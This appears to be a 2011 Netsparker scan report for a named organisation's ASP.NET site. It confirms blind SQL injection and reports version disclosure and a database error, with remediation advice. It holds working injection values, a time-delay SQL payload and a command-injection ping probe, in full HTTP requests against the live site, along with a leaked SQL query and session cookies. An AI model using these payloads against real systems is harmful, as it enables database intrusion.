XSS, Cross Site Scripting, CWE-79, CAPEC-86, Javascript InjectionNetsparker - Scan Report Summary
|
||||||||||
|
Total RequestsAverage Speedreq/sec. |
6
identified
3
confirmed
2
critical
2
informational
|
||||||||
GHDB, DORK TestsGHDB, DORK Tests
|
||||||||||
|
Authentication
Scheduled
|
|||||||||
VULNERABILITIESVulnerabilities
|
||
 |
CRITICAL
33 %
LOW
33 %
INFORMATION
33 %
|
|
Blind SQL Injection
Blind SQL Injection
2
TOTAL
CRITICAL
CONFIRMED
2
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Netsparker confirmed the vulnerability by executing a test SQL Query on the back-end database. In these tests, SQL Injection was not obvious but the different responses from the page based on the injection test allowed us to identify and confirm the SQL Injection.
Impact
Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:
- Reading, Updating and Deleting arbitrary data from the database
- Executing commands on the underlying operating system
- Reading, Updating and Deleting arbitrary tables from the database
Actions to Take
- See the remedy for solution.
- If you are not using a database access layer (DAL), consider using one. This will help you to centralise the issue. You can also use an ORM (object relational mapping). Most of the ORM systems use only parameterised queries and this can solve the whole SQL Injection problem.
- Locate the all dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM change all legacy code to use these new libraries)
- Use your weblogs and application logs to see if there was any previous but undetected attack to this resource.
Remedy
A robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.
Required Skills for Successful Exploitation
There are numerous freely available tools to exploit SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.
External References
Remedy References
|
- /Bpaww_com/Menus/SubMenu.aspx
/Bpaww_com/Menus/SubMenu.aspx CONFIRMED |
Parameters
| Parameter | Type | Value |
| menu | GET | ';WAITFOR DELAY '0:0:25'-- |
| pk | GET | 5hhpqw55na20qc45eudx14yk |
Request
GET /Bpaww_com/Menus/SubMenu.aspx?menu=%27;WAITFOR%20DELAY%20%270:0:25%27--&pk=5hhpqw55na20qc45eudx14yk HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.bpaww.com
Cookie: ASP.NET_SessionId=1z42d445lrw0j43555dorb45
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.bpaww.com
Cookie: ASP.NET_SessionId=1z42d445lrw0j43555dorb45
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Fri, 08 Apr 2011 17:10:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Expires: Fri, 08 Apr 2011 17:10:15 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 982
No menu with that name found
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sub Menu
</title><link id="DefaultStyle" rel="stylesheet" type="text/css" href="../Styles/DefaultStyle.css" /></head>
<body style="margin: 0;" >
<form name="MenuForm" method="post" action="SubMenu.aspx?menu='%3bWAITFOR+DELAY+'0%3a0%3a25'--&pk=5hhpqw55na20qc45eudx14yk" id="MenuForm" target="_top">
<div>
<input type="hidden" name="PropertyTable" id="PropertyTable" value="ResourceName:U3ViTWVudQ==|ContentName:" />
<input type="hidden" name="__VIEWSTATE" id="
__VIEWSTATE" value="" />
</div>
<div>
<table class="SubMenu" cellpadding="0" cellspacing="0" border="0">
<tr>
<td>
</td>
</tr>
</table>
</div>
</form>
</body>
</html>
Date: Fri, 08 Apr 2011 17:10:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Expires: Fri, 08 Apr 2011 17:10:15 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 982
No menu with that name found
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sub Menu
</title><link id="DefaultStyle" rel="stylesheet" type="text/css" href="../Styles/DefaultStyle.css" /></head>
<body style="margin: 0;" >
<form name="MenuForm" method="post" action="SubMenu.aspx?menu='%3bWAITFOR+DELAY+'0%3a0%3a25'--&pk=5hhpqw55na20qc45eudx14yk" id="MenuForm" target="_top">
<div>
<input type="hidden" name="PropertyTable" id="PropertyTable" value="ResourceName:U3ViTWVudQ==|ContentName:" />
<input type="hidden" name="__VIEWSTATE" id="
__VIEWSTATE" value="" />
</div>
<div>
<table class="SubMenu" cellpadding="0" cellspacing="0" border="0">
<tr>
<td>
</td>
</tr>
</table>
</div>
</form>
</body>
</html>
|
- /Bpaww_com/Menus/SubMenu.aspx
/Bpaww_com/Menus/SubMenu.aspx CONFIRMED |
Parameters
| Parameter | Type | Value |
| menu | GET | ';WAITFOR DELAY '0:0:25'-- |
| pk | GET | 5hhpqw55na20qc45eudx14yk |
| PropertyTable | GET | ResourceName:U3ViTWVudQ==|ContentName: |
Request
GET /Bpaww_com/Menus/SubMenu.aspx?menu=%27;WAITFOR%20DELAY%20%270:0:25%27--&pk=5hhpqw55na20qc45eudx14yk&PropertyTable=ResourceName%3aU3ViTWVudQ%3d%3d%7cContentName%3a HTTP/1.1
Referer: http://www.bpaww.com/Bpaww_com/Menus/SubMenu.aspx?menu=ContactBPA&pk=5hhpqw55na20qc45eudx14yk&__EVENTARGUMENT=&__EVENTTARGET=&__PREVIOUSPAGE=_XRA2oDiYElnSYYpYnVqVAfc423spkigUUSZB0JV4XBD4iLkQ3U5kb0K0KmphuTsJAn1SLsR01-o_oj-dJzb-d8vhH-q2QM6JvJbllTsexBmlZDO0&__VIEWSTATE=&PropertyTable=ResourceName%3aU3ViTWVudQ%3d%3d%7cContentName%3a
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.bpaww.com
Cookie: ASP.NET_SessionId=1z42d445lrw0j43555dorb45
Accept-Encoding: gzip, deflate
Referer: http://www.bpaww.com/Bpaww_com/Menus/SubMenu.aspx?menu=ContactBPA&pk=5hhpqw55na20qc45eudx14yk&__EVENTARGUMENT=&__EVENTTARGET=&__PREVIOUSPAGE=_XRA2oDiYElnSYYpYnVqVAfc423spkigUUSZB0JV4XBD4iLkQ3U5kb0K0KmphuTsJAn1SLsR01-o_oj-dJzb-d8vhH-q2QM6JvJbllTsexBmlZDO0&__VIEWSTATE=&PropertyTable=ResourceName%3aU3ViTWVudQ%3d%3d%7cContentName%3a
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.bpaww.com
Cookie: ASP.NET_SessionId=1z42d445lrw0j43555dorb45
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Fri, 08 Apr 2011 17:12:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Expires: Fri, 08 Apr 2011 17:11:58 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 1049
No menu with that name found
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sub Menu
</title><link id="DefaultStyle" rel="stylesheet" type="text/css" href="../Styles/DefaultStyle.css" /></head>
<body style="margin: 0;" >
<form name="MenuForm" method="post" action="SubMenu.aspx?menu='%3bWAITFOR+DELAY+'0%3a0%3a25'--&pk=5hhpqw55na20qc45eudx14yk&PropertyTable=ResourceName%3aU3ViTWVudQ%3d%3d%7cContentName%3a" id="MenuForm" target="_top">
<div>
<input type="hidden" name="PropertyTable" id="PropertyTable" value="ResourceName:U3ViTWVudQ==|ContentName:" />
<input type="hidden" name="__VIEWSTATE" id="
__VIEWSTATE" value="" />
</div>
<div>
<table class="SubMenu" cellpadding="0" cellspacing="0" border="0">
<tr>
<td>
</td>
</tr>
</table>
</div>
</form>
</body>
</html>
Date: Fri, 08 Apr 2011 17:12:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Expires: Fri, 08 Apr 2011 17:11:58 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 1049
No menu with that name found
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sub Menu
</title><link id="DefaultStyle" rel="stylesheet" type="text/css" href="../Styles/DefaultStyle.css" /></head>
<body style="margin: 0;" >
<form name="MenuForm" method="post" action="SubMenu.aspx?menu='%3bWAITFOR+DELAY+'0%3a0%3a25'--&pk=5hhpqw55na20qc45eudx14yk&PropertyTable=ResourceName%3aU3ViTWVudQ%3d%3d%7cContentName%3a" id="MenuForm" target="_top">
<div>
<input type="hidden" name="PropertyTable" id="PropertyTable" value="ResourceName:U3ViTWVudQ==|ContentName:" />
<input type="hidden" name="__VIEWSTATE" id="
__VIEWSTATE" value="" />
</div>
<div>
<table class="SubMenu" cellpadding="0" cellspacing="0" border="0">
<tr>
<td>
</td>
</tr>
</table>
</div>
</form>
</body>
</html>
ASP.NET Version Disclosure
ASP.NET Version Disclosure
1
TOTAL
LOW
Netsparker identified that the target web server is disclosing ASP.NET version in the HTTP response. This information can help an attacker to develop further attacks and also the system can become an easier target for automated attacks. It was leaked from
X-AspNet-Version banner of HTTP response or default ASP.NET error page.
Impact
An attacker can use disclosed information to harvest specific security vulnerabilities for the version identified. The attacker can also use this information in conjunction with the other vulnerabilities in the application or web server.
Remedy
Apply the following changes on your
web.config file to prevent information leakage by using custom error pages and removing X-AspNet-Version from HTTP responses.
<System.Web>
< httpRuntime enableVersionHeader="false" />
<customErrors mode="On" defaultRedirect="~/error/GeneralError.aspx">
<error statusCode="403" redirect="~/error/Forbidden.aspx" />
<error statusCode="404" redirect="~/error/PageNotFound.aspx" />
<error statusCode="500" redirect="~/error/InternalError.aspx" />
</customErrors>
</System.Web>
Remedy References
|
- /Bpaww_com/Menus/SubMenu.aspx
/Bpaww_com/Menus/SubMenu.aspx |
Extracted Version
X-AspNet-Version: 2.0.50727
Request
GET /Bpaww_com/Menus/SubMenu.aspx?menu=ContactBPA&pk=5hhpqw55na20qc45eudx14yk&PropertyTable=ResourceName%3aU3ViTWVudQ%3d%3d%7cContentName%3a HTTP/1.1
Referer: http://www.bpaww.com/Bpaww_com/Menus/SubMenu.aspx?menu=ContactBPA&pk=5hhpqw55na20qc45eudx14yk&__EVENTARGUMENT=&__EVENTTARGET=&__PREVIOUSPAGE=_XRA2oDiYElnSYYpYnVqVAfc423spkigUUSZB0JV4XBD4iLkQ3U5kb0K0KmphuTsJAn1SLsR01-o_oj-dJzb-d8vhH-q2QM6JvJbllTsexBmlZDO0&__VIEWSTATE=&PropertyTable=ResourceName%3aU3ViTWVudQ%3d%3d%7cContentName%3a
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.bpaww.com
Cookie: ASP.NET_SessionId=1z42d445lrw0j43555dorb45
Accept-Encoding: gzip, deflate
Referer: http://www.bpaww.com/Bpaww_com/Menus/SubMenu.aspx?menu=ContactBPA&pk=5hhpqw55na20qc45eudx14yk&__EVENTARGUMENT=&__EVENTTARGET=&__PREVIOUSPAGE=_XRA2oDiYElnSYYpYnVqVAfc423spkigUUSZB0JV4XBD4iLkQ3U5kb0K0KmphuTsJAn1SLsR01-o_oj-dJzb-d8vhH-q2QM6JvJbllTsexBmlZDO0&__VIEWSTATE=&PropertyTable=ResourceName%3aU3ViTWVudQ%3d%3d%7cContentName%3a
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.bpaww.com
Cookie: ASP.NET_SessionId=1z42d445lrw0j43555dorb45
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Fri, 08 Apr 2011 17:10:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Expires: Fri, 08 Apr 2011 17:10:07 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 5460
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sub Menu
</title><link id="DefaultStyle" rel="stylesheet" type="text/css" href="../Styles/DefaultStyle.css" /></head>
<body style="margin: 0;" >
<form name="MenuForm" method="post" action="SubMenu.aspx?menu=ContactBPA&pk=5hhpqw55na20qc45eudx14yk&PropertyTable=ResourceName%3aU3ViTWVudQ%3d%3d%7cContentName%3a" id="MenuForm" target="_top">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="PropertyTable" id="PropertyTable" value="ResourceName:U3ViTWVudQ==|ContentName:" />
<input type="hidden" name="__VIEWSTATE" id="
__VIEWSTATE" value="" />
</div>
<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['MenuForm'];
if (!theForm) {
theForm = document.MenuForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>
<script src="/Bpaww_com/Menus/WebResource.axd?d=HxRulybcMAqY2MDQ5Z_H3fyi8wZixw0XS3-GPezcAQR0j5f_ah7kNB6_zvLelc15ae9pxVjKX04bFeafKRJgz84TroM1&t=634219308858477393" type="text/javascript"></script>
<div>
<input type="hidden" name="__PREVIOUSPAGE" id="__PREVIOUSPAGE" value="_XRA2oDiYElnSYYpYnVqVAfc423spkigUUSZB0JV4XBD4iLkQ3U5kb0K0KmphuTsJAn1SLsR01-o_oj-dJzb-d8vhH-q2QM6JvJbllTsexBmlZDO0" />
</div>
<div>
<table class="SubMenu" cellpadding="0" cellspacing="0" border="0">
<tr>
<td>
<table id="dList" cellspacing="0" border="0" style="border-collapse:collapse;">
<tr>
<td>
<!--<a href='http://www.bpaww.com/Bpaww_com/Pages/Contact.aspx' target="_top" style="width: 100%;" >General Feedback</a>-->
<a id="dList_ctl00_lnk" title="General Feedback" href="javascript:WebForm_DoPostBackWithOptions(new WebForm_PostBackOptions("dList$ctl00$lnk", "", false, "", "http://www.bpaww.com/Bpaww_com/Pages/Contact.aspx", false, true))" style="display:inline-block;width:100%;">General Feedback</a>
</td>
</tr><tr>
<td>
<!--<a href='http://www.bpaww.com/Bpaww_com/Pages/staff.aspx' target="_top" style="width: 100%;" >BPA Staff</a>-->
<a id="dList_ctl01_lnk" title="BPA Staff" href="javascript:WebForm_DoPostBackWithOptions(new WebForm_PostBackOptions("dList$ctl01$lnk", "", false, "", "http://www.bpaww.com/Bpaww_com/Pages/staff.aspx", false, true))" style="display:inline-block;width:100%;">BPA Staff</a>
</td>
</tr><tr>
<td>
<!--<a href='http://www.bpaww.com/Bpaww_com/Pages/OfficeLocs.aspx' target="_top" style="width: 100%;" >Office Locations</a>-->
<a id="dList_ctl02_lnk" title="Office Locations" href="javascript:WebForm_DoPostBackWithOptions(new WebForm_PostBackOptions("dList$ctl02$lnk", "", false, "", "http://www.bpaww.com/Bpaww_com/Pages/OfficeLocs.aspx", false, true))" style="display:inline-block;width:100%;">Office Locations</a>
</td>
</tr><tr>
<td>
<!--<a href='http://www.bpaww.com/Bpaww_com/Pages/Directions.aspx' target="_top" style="width: 100%;" >Directions</a>-->
<a id="dList_ctl03_lnk" title="Directions" href="javascript:WebForm_DoPostBackWithOptions(new WebForm_PostBackOptions("dList$ctl03$lnk", "", false, "", "http://www.bpaww.com/Bpaww_com/Pages/Directions.aspx", false, true))" style="display:inline-block;width:100%;">Directions</a>
</td>
</tr><tr>
<td>
<!--<a href='http://www.bpaww.com/Bpaww_com/Pages/Membership.aspx' target="_top" style="width: 100%;" >Become a Member</a>-->
<a id="dList_ctl04_lnk" title="Become a Member" href="javascript:WebForm_DoPostBackWithOptions(new WebForm_PostBackOptions("dList$ctl04$lnk", "", false, "", "http://www.bpaww.com/Bpaww_com/Pages/Membership.aspx", false, true))" style="display:inline-block;width:100%;">Become a Member</a>
</td>
</tr><tr>
<td>
<!--<a href='http://www.bpaww.com/Bpaww_com/Pages/MemberRelations.aspx' target="_top" style="width: 100%;" >Member Relations Managers</a>-->
<a id="dList_ctl05_lnk" title="Member Relations Managers" href="javascript:WebForm_DoPostBackWithOptions(new WebForm_PostBackOptions("dList$ctl05$lnk", "", false, "", "http://www.bpaww.com/Bpaww_com/Pages/MemberRelations.aspx", false, true))" style="display:inline-block;width:100%;">Member Relations Managers</a>
</td>
</tr>
</table>
</td>
</tr>
</table>
</div>
</form>
</body>
</html>
Date: Fri, 08 Apr 2011 17:10:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Expires: Fri, 08 Apr 2011 17:10:07 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 5460
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sub Menu
</title><link id="DefaultStyle" rel="stylesheet" type="text/css" href="../Styles/DefaultStyle.css" /></head>
<body style="margin: 0;" >
<form name="MenuForm" method="post" action="SubMenu.aspx?menu=ContactBPA&pk=5hhpqw55na20qc45eudx14yk&PropertyTable=ResourceName%3aU3ViTWVudQ%3d%3d%7cContentName%3a" id="MenuForm" target="_top">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="PropertyTable" id="PropertyTable" value="ResourceName:U3ViTWVudQ==|ContentName:" />
<input type="hidden" name="__VIEWSTATE" id="
__VIEWSTATE" value="" />
</div>
<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['MenuForm'];
if (!theForm) {
theForm = document.MenuForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>
<script src="/Bpaww_com/Menus/WebResource.axd?d=HxRulybcMAqY2MDQ5Z_H3fyi8wZixw0XS3-GPezcAQR0j5f_ah7kNB6_zvLelc15ae9pxVjKX04bFeafKRJgz84TroM1&t=634219308858477393" type="text/javascript"></script>
<div>
<input type="hidden" name="__PREVIOUSPAGE" id="__PREVIOUSPAGE" value="_XRA2oDiYElnSYYpYnVqVAfc423spkigUUSZB0JV4XBD4iLkQ3U5kb0K0KmphuTsJAn1SLsR01-o_oj-dJzb-d8vhH-q2QM6JvJbllTsexBmlZDO0" />
</div>
<div>
<table class="SubMenu" cellpadding="0" cellspacing="0" border="0">
<tr>
<td>
<table id="dList" cellspacing="0" border="0" style="border-collapse:collapse;">
<tr>
<td>
<!--<a href='http://www.bpaww.com/Bpaww_com/Pages/Contact.aspx' target="_top" style="width: 100%;" >General Feedback</a>-->
<a id="dList_ctl00_lnk" title="General Feedback" href="javascript:WebForm_DoPostBackWithOptions(new WebForm_PostBackOptions("dList$ctl00$lnk", "", false, "", "http://www.bpaww.com/Bpaww_com/Pages/Contact.aspx", false, true))" style="display:inline-block;width:100%;">General Feedback</a>
</td>
</tr><tr>
<td>
<!--<a href='http://www.bpaww.com/Bpaww_com/Pages/staff.aspx' target="_top" style="width: 100%;" >BPA Staff</a>-->
<a id="dList_ctl01_lnk" title="BPA Staff" href="javascript:WebForm_DoPostBackWithOptions(new WebForm_PostBackOptions("dList$ctl01$lnk", "", false, "", "http://www.bpaww.com/Bpaww_com/Pages/staff.aspx", false, true))" style="display:inline-block;width:100%;">BPA Staff</a>
</td>
</tr><tr>
<td>
<!--<a href='http://www.bpaww.com/Bpaww_com/Pages/OfficeLocs.aspx' target="_top" style="width: 100%;" >Office Locations</a>-->
<a id="dList_ctl02_lnk" title="Office Locations" href="javascript:WebForm_DoPostBackWithOptions(new WebForm_PostBackOptions("dList$ctl02$lnk", "", false, "", "http://www.bpaww.com/Bpaww_com/Pages/OfficeLocs.aspx", false, true))" style="display:inline-block;width:100%;">Office Locations</a>
</td>
</tr><tr>
<td>
<!--<a href='http://www.bpaww.com/Bpaww_com/Pages/Directions.aspx' target="_top" style="width: 100%;" >Directions</a>-->
<a id="dList_ctl03_lnk" title="Directions" href="javascript:WebForm_DoPostBackWithOptions(new WebForm_PostBackOptions("dList$ctl03$lnk", "", false, "", "http://www.bpaww.com/Bpaww_com/Pages/Directions.aspx", false, true))" style="display:inline-block;width:100%;">Directions</a>
</td>
</tr><tr>
<td>
<!--<a href='http://www.bpaww.com/Bpaww_com/Pages/Membership.aspx' target="_top" style="width: 100%;" >Become a Member</a>-->
<a id="dList_ctl04_lnk" title="Become a Member" href="javascript:WebForm_DoPostBackWithOptions(new WebForm_PostBackOptions("dList$ctl04$lnk", "", false, "", "http://www.bpaww.com/Bpaww_com/Pages/Membership.aspx", false, true))" style="display:inline-block;width:100%;">Become a Member</a>
</td>
</tr><tr>
<td>
<!--<a href='http://www.bpaww.com/Bpaww_com/Pages/MemberRelations.aspx' target="_top" style="width: 100%;" >Member Relations Managers</a>-->
<a id="dList_ctl05_lnk" title="Member Relations Managers" href="javascript:WebForm_DoPostBackWithOptions(new WebForm_PostBackOptions("dList$ctl05$lnk", "", false, "", "http://www.bpaww.com/Bpaww_com/Pages/MemberRelations.aspx", false, true))" style="display:inline-block;width:100%;">Member Relations Managers</a>
</td>
</tr>
</table>
</td>
</tr>
</table>
</div>
</form>
</body>
</html>
Database Error Message
Database Error Message
1
TOTAL
LOW
Netsparker identified a database error message.
Impact
The error message may disclose sensitive information and this information can be used by an attacker to mount new attacks or to enlarge the attack surface. In rare conditions this may be a clue for an SQL Injection vulnerability. Most of the time Netsparker will detect and report that problem separately.
Remedy
Do not provide any error messages on production environments. Save error messages with a reference number to a backend storage such as a text file or database, then show this number and a static user-friendly error message to the user.
|
- /Bpaww_com/Menus/SubMenu.aspx
/Bpaww_com/Menus/SubMenu.aspx |
Parameters
| Parameter | Type | Value |
| menu | GET | "& ping -n 26 127.0.0.1 & |
| pk | GET | 5hhpqw55na20qc45eudx14yk |
Request
GET /Bpaww_com/Menus/SubMenu.aspx?menu=%22%26%20ping%20-n%2026%20127.0.0.1%20%26&pk=5hhpqw55na20qc45eudx14yk HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.bpaww.com
Cookie: ASP.NET_SessionId=1z42d445lrw0j43555dorb45
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.bpaww.com
Cookie: ASP.NET_SessionId=1z42d445lrw0j43555dorb45
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Fri, 08 Apr 2011 17:10:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Expires: Fri, 08 Apr 2011 17:10:13 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 1214
An error was generated: Incorrect syntax near the keyword 'FROM'.
SELECT DISTINCT Keys as [Key],
LngID as LanguageID,
Grp as [Group],
EngLang as EngLang,
NatLang as NativeLanguage, FROM #LangMapNames o1, #LangMapName l1 where o1.LngMapName = l1.LngMapName
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sub Menu
</title><link id="DefaultStyle" rel="stylesheet" type="text/css" href="../Styles/DefaultStyle.css" /></head>
<body style="margin: 0;" >
<form name="MenuForm" method="post" action="SubMenu.aspx?menu=%22%26+ping+-n+26+127.0.0.1+%26&pk=5hhpqw55na20qc45eudx14yk" id="MenuForm" target="_top">
<div>
<input type="hidden" name="PropertyTable" id="PropertyTable" value="ResourceName:U3ViTWVudQ==|ContentName:" />
<input type="hidden" name="__VIEWSTATE" id="
__VIEWSTATE" value="" />
</div>
<div>
<table class="SubMenu" cellpadding="0" cellspacing="0" border="0">
<tr>
<td>
</td>
</tr>
</table>
</div>
</form>
</body>
</html>
Date: Fri, 08 Apr 2011 17:10:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Expires: Fri, 08 Apr 2011 17:10:13 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 1214
An error was generated: Incorrect syntax near the keyword 'FROM'.
SELECT DISTINCT Keys as [Key],
LngID as LanguageID,
Grp as [Group],
EngLang as EngLang,
NatLang as NativeLanguage, FROM #LangMapNames o1, #LangMapName l1 where o1.LngMapName = l1.LngMapName
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sub Menu
</title><link id="DefaultStyle" rel="stylesheet" type="text/css" href="../Styles/DefaultStyle.css" /></head>
<body style="margin: 0;" >
<form name="MenuForm" method="post" action="SubMenu.aspx?menu=%22%26+ping+-n+26+127.0.0.1+%26&pk=5hhpqw55na20qc45eudx14yk" id="MenuForm" target="_top">
<div>
<input type="hidden" name="PropertyTable" id="PropertyTable" value="ResourceName:U3ViTWVudQ==|ContentName:" />
<input type="hidden" name="__VIEWSTATE" id="
__VIEWSTATE" value="" />
</div>
<div>
<table class="SubMenu" cellpadding="0" cellspacing="0" border="0">
<tr>
<td>
</td>
</tr>
</table>
</div>
</form>
</body>
</html>
Microsoft SQL Server Identified
Microsoft SQL Server Identified
1
TOTAL
INFORMATION
CONFIRMED
1
Netsparker identified that the target web site is using Microsoft SQL Server as backend database. This issue is reported for information purposes only.
Impact
This issue is reported as additional information only, there is no direct impact arising from this issue.
|
- /Bpaww_com/Menus/SubMenu.aspx
/Bpaww_com/Menus/SubMenu.aspx CONFIRMED |
Request
GET /Bpaww_com/Menus/SubMenu.aspx?menu=%27;WAITFOR%20DELAY%20%270:0:25%27--&pk=5hhpqw55na20qc45eudx14yk HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.bpaww.com
Cookie: ASP.NET_SessionId=1z42d445lrw0j43555dorb45
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.bpaww.com
Cookie: ASP.NET_SessionId=1z42d445lrw0j43555dorb45
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Fri, 08 Apr 2011 17:10:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Expires: Fri, 08 Apr 2011 17:10:15 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 982
No menu with that name found
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sub Menu
</title><link id="DefaultStyle" rel="stylesheet" type="text/css" href="../Styles/DefaultStyle.css" /></head>
<body style="margin: 0;" >
<form name="MenuForm" method="post" action="SubMenu.aspx?menu='%3bWAITFOR+DELAY+'0%3a0%3a25'--&pk=5hhpqw55na20qc45eudx14yk" id="MenuForm" target="_top">
<div>
<input type="hidden" name="PropertyTable" id="PropertyTable" value="ResourceName:U3ViTWVudQ==|ContentName:" />
<input type="hidden" name="__VIEWSTATE" id="
__VIEWSTATE" value="" />
</div>
<div>
<table class="SubMenu" cellpadding="0" cellspacing="0" border="0">
<tr>
<td>
</td>
</tr>
</table>
</div>
</form>
</body>
</html>
Date: Fri, 08 Apr 2011 17:10:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
